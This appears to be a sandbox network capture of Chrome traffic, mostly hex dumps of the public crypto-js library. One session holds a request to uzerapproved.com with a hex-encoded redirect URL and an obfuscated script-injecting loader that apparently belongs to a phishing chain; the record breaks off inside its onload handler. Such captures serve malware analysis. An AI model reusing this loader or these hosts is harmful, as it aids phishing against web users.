2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e Data Ascii: d"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 Data Ascii: 4-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 2c 63 29 2c Data Ascii: ._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 Data Ascii: e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 3b 6b 74 5b 72 5d 3d 73 5e 63 7d 74 5b Data Ascii: ]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+oo,c=((4294901760&i)i\|0)+((65535&i)*i\|0);kt[r]=s^c}t[
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61 62 73 28 6c 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 76 61 Data Ascii: %48,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296l.abs(l.sin(t+1))\|0}();va
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 76 2c 32 33 2c 48 5b 33 39 5d 29 2c 53 3d 43 28 53 Data Ascii: ,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x,b,S,v,23,H[39]),S=C(S
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 2c 65 2c Data Ascii: this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r\|~e&i)+n+s;return(c<<o\|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i\|r&~i)+n+s;return(c<<o\|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o\|c>>>32-o)+e}function D(t,e,
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 Data Ascii: =e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0\|t))\|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=e(n.pow(r,1/3)),i++),r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	69.49.245.172	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:08 UTC	451	OUT	GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail HTTP/1.1 Host: uzerapproved.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:08 UTC	196	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:07 GMT Server: Apache Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: text/javascript;charset=UTF-8
2024-10-01 22:19:08 UTC	2019	IN	Data Raw: 37 64 37 0d 0a 20 20 20 20 76 61 72 20 70 54 48 75 6e 62 67 66 75 74 45 69 4a 53 4e 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 70 54 48 75 6e 62 67 66 75 74 45 69 4a 53 4e 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 70 54 48 75 6e 62 67 66 75 74 45 69 4a 53 4e 73 29 3b 0d 0a 70 54 48 75 6e 62 67 66 75 74 45 69 4a 53 4e 73 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: 7d7 var pTHunbgfutEiJSNs = document.createElement("script");pTHunbgfutEiJSNs.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(pTHunbgfutEiJSNs);pTHunbgfutEiJSNs.onload=function()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.17.25.14	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:08 UTC	386	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:08 UTC	934	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:08 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 108074 Expires: Sun, 21 Sep 2025 22:19:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umAbYNukD62%2Fced8gEZW1ZSxsVZAXgowbCaxPW8fimoVWJYWa6I0rMHK3Cnb%2BGEHLH1hBFj0gAi%2Flhn%2Fmt2EbMOP%2BCARPyfM1KAOcBt5YzDj%2BSnh40MBfmdg2rrdV431KaOGeHtR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8cbfd524cd1b7cf6-EWR
2024-10-01 22:19:08 UTC	435	IN	Data Raw: 37 62 66 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 7bf9!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 Data Ascii: fined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{re
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 Data Ascii: >>>24-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 Data Ascii: this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 Data Ascii: ,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)\|0,e[3]=e[3]+12953075
2024-10-01 22:19:08 UTC	1369	IN	Data Raw: 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 3b 6b 74 5b 72 5d 3d 73 5e Data Ascii: ,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+oo,c=((4294901760&i)i\|0)+((65535&i)*i\|0);kt[r]=s^
